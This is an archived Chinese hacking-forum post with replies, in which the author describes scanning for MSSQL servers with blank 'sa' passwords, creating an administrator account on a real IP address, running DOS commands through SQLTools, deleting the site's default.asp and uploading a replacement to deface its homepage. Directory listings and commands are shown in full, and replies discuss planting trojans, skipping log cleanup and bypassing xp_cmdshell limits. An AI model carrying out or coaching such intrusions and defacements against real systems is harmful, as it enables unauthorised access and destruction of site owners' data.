文章作者：fhod

请一夜无聊！和H.U.N联盟的几个兄弟侃。开着win2000自动攻击探测器。喝杯咖啡先！没多久结果就出来了！扫出的还倒不少哦！随便拿一个来看看把！这里就不多列了。

主机:222.65.152.122
SQL漏洞:
sa帐号密码为空。
主机:222.65.152.166
SQL漏洞:
sa帐号密码为空。
建立系统管理员帐号(shanlu)成功。

打开SQLTools连接222.65.152.122。！！提示连接不成功！郁闷！呵呵~~~不怕，还有呢！换一个！

222.65.152.166 OK！连接成功！相信大多数人都用过SQLTools这个工具把。功能我就不怎么介绍了！ 既然他有SQL漏洞，一定有主页把！在IE里输入http://222.65.152.166 晕了！主页里既然什么都没，就那么一句话"欢迎来到某某主页"。嘎嘎！我们来帮他把主页做完整把！大家注意！下面更精彩！


先用SQLTools执行 DOS命令！

C:\>DIR C:\
驱动器 C 中的卷是 Dell Server
卷的序列号是 A090-60E1

C:\ 的目录

2003-05-28 08:48 <DIR> Dell
2003-05-28 14:15 <DIR> Documents and Settings
2003-05-28 14:18 194,656 DOMSA_SETUP.LOG
2004-05-12 13:33 <DIR> Downloads
1995-08-12 10:51 45,675 HD.EXE
2003-06-06 11:13 <DIR> Inetpub
2003-05-30 18:11 <DIR> Korapps
2004-04-12 02:15 56 lost2.txt
2004-03-17 21:37 14,629 odbcconf.log
2004-08-31 17:57 <DIR> Program Files
2003-05-30 18:20 <DIR> SP
2004-03-17 21:11 <DIR> sql2ksp3
2004-09-06 08:01 <DIR> temp
2004-09-07 01:02 <DIR> WINNT
2003-10-24 11:47 <DIR> WUTemp

HOHO~~~看见什么没有！ Inetpub

现在在看看他文件里是什么。

2003-06-06 11:13 <DIR> .
2003-06-06 11:13 <DIR> ..
2003-05-28 01:05 <DIR> AdminScripts
2003-09-24 12:37 <DIR> ftproot
2003-05-28 01:05 <DIR> iissamples
2003-05-28 14:07 <DIR> mailroot
2003-06-14 14:46 <DIR> scripts
2004-09-10 01:05 <DIR> wwwroot

接着DIR C:\Inetpub\wwwroot

在wwwroot目录下发现了一个default.asp文件，这个就是默认的主页文件了。现在我们来替换他的主页。怎么替换呢！！！！！！！我们也没他的shell，又没开他端口。而且连个webshell也没有。难道我们就什么办法都没了吗！ 当然不是！要不我也不会写这篇文章了！

SQLTools就为我们提供了一个好东东！就是上传文件功能。我们在被地编译一个index.htm或者default.asp都可以，只要是默认主页的文件名就行。

现在还不要上传呢！我们还需要一个DOS命令。首先我们要把他的主页文件给删除了才行啊！

del C:\Inetpub\wwwroot\default.asp

为了确认有没删除，再用dir C:\Inetpub\wwwroot\看一下！

2004-09-10 01:05 <DIR> .
2004-09-10 01:05 <DIR> ..
1999-06-03 10:13 342 help.gif
1999-12-16 03:44 1,628 iisstart.asp
2003-05-28 14:07 <DIR> images
2003-07-08 16:45 <DIR> Inc
2003-07-09 09:23 2,541 korchina.css
1999-12-16 03:44 6,566 localstart.asp
2003-08-01 11:00 <DIR> logicbox
1999-06-03 10:13 356 mmc.gif
1999-06-03 10:13 2,806 pagerror.gif
2003-08-01 11:00 <DIR> photo_web
2003-05-28 14:07 2,149 postinfo.html
1999-06-03 10:13 1,046 print.gif
1999-06-03 10:13 1,577 warning.gif
1999-06-03 10:13 1,182 web.gif
1999-06-03 10:13 4,670 win2000.gif
2003-05-28 14:07 <DIR> _private
2003-06-27 12:32 1,561 _vti_inf.html
2003-05-28 14:07 <DIR> _vti_log

确实没有了！删除成功！接着就是上传文件了。把我们本机的index.htm上传到对方C:\Inetpub\wwwroot下。（注意这里的保存文件在一定要是个完整的路径就是C:\Inetpub\wwwroot\index.htm）

OK~~！上传成功！最后在IE里刷新下http://222.65.152.166/ 呵呵~~~~看到么！主页已经被我给替换了！看下我的抓图！
HOHO~~~~好了！就不多说了！自在轮回那丫的又再说我做坏事呢！说起来他比我还要坏！

前一夜搞的比我还要多！嘎嘎！

本人也没什么多高深的技术！只是换了一种思路来替换对方的主页，也不用去益出开端口那么麻烦了。也不知道有没有人用过这个方法来黑站，但我可以保证这是我无聊的时候想着做的！

晕了。没想到FHOD的这篇稿子还存活着呢。。
哈哈。 [s:51]

没啥新意，才来看看，名气大不=技术好。失望。

引用:

下面是引用没事来看看于2005-11-11 21:01发表的:
没啥新意，才来看看，名气大不=技术好。失望。

呵呵，觉得简单了？尖端的怕你又看不懂。
要是这么简单的都不会那还说什么很深的呢？
所以别看人家写了简单的东西就觉得人家没技术，还失望....
说句打击你的话,你还没权利对别人说失望两个字.(就不说你没资格了)

有了sa  那干什么不行
这文章没什么太大意义。

引用:

下面是引用sunwear于2005-11-12 10:37发表的:
有了sa  那干什么不行
这文章没什么太大意义。

好象不一定哦！

有sa
可是什么也用不了
我碰过多了

引用:

下面是引用十四郎于2005-11-12 23:08发表的:


好象不一定哦！

有sa
.......

那要看你会不会了

说实在的.这文章确实没多大技术含量.俺自己也承认.,这都一年前的文章了..那时候自己菜.啥都不会..随便写着玩的
没想到还存活着呢,,
也不知道冰血封情大哥从哪找来的.

我不会..................
其实所谓有价值没价值,得看对什么人而言喽!
反正我不会就对喽......................

邪恶八进制论坛上真好看 [s:39]

特别是这两天，好热闹 [s:51]

还有好多马甲的说

我感觉吧。有时候工具太强大了也不好，容易冻结人的思路。

就比如这位兄弟都忘记了清理日制的说。

益出开端口最大的好处是不会在有些服务器留下脚印。那次老师上课讲如何防御，我故意气他，溢出一台，桌面放个文档，让他找日志。。。（没防火）

换做是我，还是选择放上马，操作方便些了。

[s:34]  [s:34] ..............................

呵呵~ 还有一种就是用echo命令来替换主页！ 也很常见！

这办法还真是简单，虽然没什么高新技术，但是给了我们些思路，和方向。 [s:45]

SA的好多都是限制过了的,提示说是没有xp_cmdshell，或者没找到xpsql70.dll,或者没找到xplog70.dll．而且现在出来的解决这种问题的办法都不是全部能解决的，我试过几个，成功机率不是很大，当然也有可能是我个人的运气的问题了．

谢谢楼主提供文章，吸取经验 [s:45]